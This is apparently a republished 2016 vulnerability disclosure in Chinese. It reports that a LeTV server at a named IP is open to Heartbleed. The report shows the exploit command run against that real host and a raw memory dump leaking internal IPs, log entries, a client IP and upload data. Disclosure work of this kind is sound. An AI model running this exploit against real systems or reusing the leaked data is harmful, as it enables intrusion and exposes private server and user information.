神刀安全网

乐视某服务器漏洞

漏洞标题 乐视某服务器漏洞
相关厂商 乐视网
漏洞作者 路人甲
提交时间 2016-04-16 15:57
公开时间 2016-05-31 22:20
漏洞类型 系统/服务补丁不及时
危害等级
自评Rank 12
漏洞状态 厂商已经确认
Tags标签

漏洞详情

站点:

https://220.181.1.131/

乐视某服务器漏洞

查看证书颁发:

乐视某服务器漏洞

存在心脏出血漏洞,可以直接读取服务器内存数据

乐视某服务器漏洞

C:/Python27/heartbleed-master-x>python hb-test.py 220.181.1.131
[+] Connecting...
[+] Sending ClientHello for TLSv1.0
[+] Waiting for Server Hello...
[+] Reveiced ServerHello for TLSv1.0
[+] Sending heartbeat request...
[+] Received heartbeat response:
.@....SC[...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#...#...
.. .#..... .=^%...D..1(i.J..3t..uO5..q....l.4.:..u.I._...S..U...Y}..5)k..]+..Y.K.fd.r....mB..R..u.U.
..|...ECy.cQ....KYx..c..0.....". .0a.EJ.]@.....!.!....p!.!..r.....{"group_name":"group104","host":"1
0.140.80.63","port":23000}.j82289492...!..P-P-....P-P=..r.P-g&fileid=dcd3375application/octet-stream
.%...#.#.....".#..HTTP/1.1 200 OK..Server: openresty..Date: Tue, 29 Mar 2016 21:45:13 GMT..Content-T
ype: application/octet-stream..Transfer-Encoding: chunked..Connection: close..Access-Control-Allow-O
rigin: *..Access-Control-Allow-Headers: Origin,X-Requested-With,Content-Type,Accept..Access-Control-
Allow-Methods: GET,POST,OPTIONS.`"r.....b.N. !0&.$...$.$.....$.$.6r.....3d.....M..L...-.!.g%x$.6r$.#
!P%.%`%...%.$.6r%p%[30/Mar/2016:05:45:13 +0800] ++ [0.004] ++ [200] ++ [POST /x/fs/getstorage HTTP/
1.1] ++ [10.140.120.45] ++ [-] ++ [resty.http/0.2] ++ [-]...3v....N.P..s!qz.T.ku...a....rn8..@3...O.
..*Wg.QO..zP..^.h...=h....X...V'.E..E.../.oZ/...n..?...S.Wq.'.d..I..n6k.q..P.~@.H^...9...a.N.. ;....
^.....n1!..B].<`A..Rz....#s.C..kd....v.....#9.O..c..).j.:e,.UYpE8hD...9;..lP.....@.&HL./!)Wmx.f5=8.?
^s,..1gH.0...Ap(...q9k....9../.ETu.4.6J..a..UZP..5..`..EJ.....X(..(..A....P..@8/Xb..0.....&fdfs_resp
_status=0&fdfs_resp_status=0;....)&fdfs_resp_status=0]1.z....0H.8a..filename=07.mkv&size=252586286&u
ploadid=160330398822&appkey=disk&chip=9&fileid=a693117d7242d3f8a32c02ff4a72b9e89a20b66f&version=2&st
atus=200&node=3001....h..+....`+s+....`+s+..&fdfs_resp_status=0..zp./uss/x/ctrl/update/single.;.mSR.
filename=07.mkv&size=252586286&uploadid=160330398822&appkey=disk&chip=9&fileid=a693117d7242d3f8a32c0
2ff4a72b9e89a20b66f&version=2&status=200&node=3001.. /..content-length..19...lqi..W.U.2.....hostacce
ptcontent-typecontent-dispositioncontent-rangesession-id....19L.4.w"}[}[....hZ}[...,.=..A.....>....8
0.63...Y.. /.EJ.@/A-X(HTTP@.....@4(..$....E.E..V = e.../.S....0... e0S...S.S...006....0... e....H=?^
..S^..H*..P..V....4.....x+...+....KyN.....pe`...p-.....eG..9...,....D....n...~..connectionngth.c|c~c
.c ;...-..._.....6r5...;h6.6x6@..6H..6.6x7.6.6r.....x7.6[30/Mar/2016:05:44:36 +0800] ++ [7.664] ++ [
200] ++ [POST /x/api/upload?mltag=1&filename=IMG_20160328_122215.jpg&fileid=cc02f9fa4f75e7f0798873f3
63ca8e2501d6fbcd&uploadid=160330420253&node=3001&size=4043177&chipsize=2021589&appkey=album_v2&uploa
dday=1459287850.675&chip=2&fstart=2021589&fstop=4043176&mltag=1 HTTP/1.1] ++ [123.181.191.81] ++ [-]
++ [Android Upload] ++ [-]...user-agenttecontent-lengthconnectionhost.7....o>.....-...3.....0.....,
.b.b..m...m...t...8.N.P.@.@...0/ikG..... /..D..... /X..qr.H@`.`... e.3..H....^..s+s+....`+s+!..<...[
..8... e200 OK.. 1.....>.>.pC..p.....0...{.X..3.%.../].$....r.....v.DOL.....^..n....7..D.]a~..|1;.Q
..Y..Yp.b...#'.H.....C...J.K.hy.HwuWJ./&.U& .-.n.....5.|."...xY}..5$.~....(....U....0.$.....5.-.....
`~....}..n.aY..n..A.....m...|D.UW..%.N$....z<'8.x!.S..D...V.g/.g...n.5..j.T.....@...e{r.7^.W..'....=
..,.}.<.N.).j>..o..T...]...!...gO.C...<M._....r.....%.....dt.f:_..b.E}..z.t[....R<..~..2l.z...xi.M.0
%.r.T...lG.._..mv?SQ..E..~....~T....s..A.A.....A.A..r.....{"group_name":"group111","host":"10.140.80
.110","port":23000}.A9477740...A..`M`M....`M`]..r.`M...H.....@.V.?.kapplication/octet-stream.E...C.C
.....B.C..HTTP/1.1 200 OK..Server: openresty..Date: Tue, 29 Mar 2016 21:44.&{.=.....6.N%.....`.....%
.EJC...k'@.....X'@.c.k..0...../letv/ups/openresty/nginx/ups_ngx_conf/x/fs_upload_pass.lua.pC..mltag=
1&filename=IMG_20160315_185943.jpg&fileid=a26acfc21180522f9c560925ee5c49f6612e9583&uploadid=16033039
7781&node=3001&size=3372836&chipsize=1686418&appkey=album_v2&uploadday=1459285914.675&chip=2&fstart=
1686418&fstop=3372835&mltag=1.....&fdfs_resp_status=06:05:....1 +0pF&fdfs_resp_status=0 [POS..../fs/
.F&fdfs_resp_status=0.140...`O,..i.oncontefilename=IMG_20160315_185943.jpg&size=3372836&uploadid=160
330397781&appkey=album_v2&chip=2&fileid=a26acfc21180522f9c560925ee5c49f6612e9583&version=2&status=20
0&node=3001G.....H+H.....H+H..&fdfs_resp_status=0...../uss/x/ctrl/updateE.....filename=IMG_20160315_
185943.jpg&size=3372836&uploadid=160330397781&appkey=album_v2&chip=2&fileid=a26acfc21180522f9c560925
ee5c49f6612e9583&version=2&status=200&node=3001.+IJ...M.EJ..cAI.C...`[...I..xg.....M..content-length
..19.O....user-agentcontent-typehostconnectionaccept-encodingcontent-dispositioncontent-rangesession
-id.200 OKaccept00..p]p].]..HTTPAJ(..$....E.E..].bpp...NpV....0...pp0W`W...V..pV.V.....W..hO.R....0.
..pp....TM.e...e..,G..M..V....-.p...0H..HHu...KyN.o....p.%...H.....eG.0Z..0M....D....n...~..connecti
onngth&n.n.n&n....=utf-8.content-typeContent-Length.313.content-lengthConnection.close.connection`..
..P9....N...!_!_....P]P..qr..Jr.....b.N.....x.{"code":2000,"result":{"size":"528301","uploadid":"160
330420146","upload":2,"downloadUrl":"http:////cloud.letv.com//uss//download//de6a78a18f8e5a81cce3da0
205c613270db996c1","fileid":"de6a78a18f8e5a81cce3da0205c613270db996c1","mime":"image//jpeg","progres
s":"100","appkey":"disk","nodeId":"3001","complete":true}}..i..-..@.{"code":2000,"result":{"size":"5
28301","uploadid.&{.=.....6.N..L.L....JY....yL.`....6$....2.5..L..'.y...0..L.~...Lx$..]...!..Lc.w...
%. ..L.b..`...`..M.#.c..}....M","fileid":"de6a78a18f8e5a81cce3da0205c613270db996c1","mime":"image//j
peg","complete":true,"progress":"100.00","nodeId":"3001","upload":2}}..;}.....r.....b.N.....02XY...Y
.Y.....Y.Y.6r.....13c....Ze*I.c.Ad...z..#..YHY.6r.....XY.v...e.....0.....].m.m..m...m...t...8.N...A.
A....cikGM..DMX..qr.,@`.`...pp.d..,...0f..19p..ec.2.8.$.=..ZQ?....kbkb....Hakb

读内存的东西应该可以确定是乐视的服务器的

downloadUrl":"http://cloud.letv.com/uss/download…..

网站路径

letv/ups/openresty/nginx/ups_ngx_conf/x/fs_upload_pass

只要不断抓取内存可以抓取可以抓取更多。。。。。

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲 @ 乌云

【本文版权归安全脉搏所有,未经许可不得转载。文章仅代表作者看法,如有不同观点,欢迎添加安全脉搏微信号:SecPulse,进行交流。】

Tags:

乐视某服务器漏洞

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 乐视某服务器漏洞

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址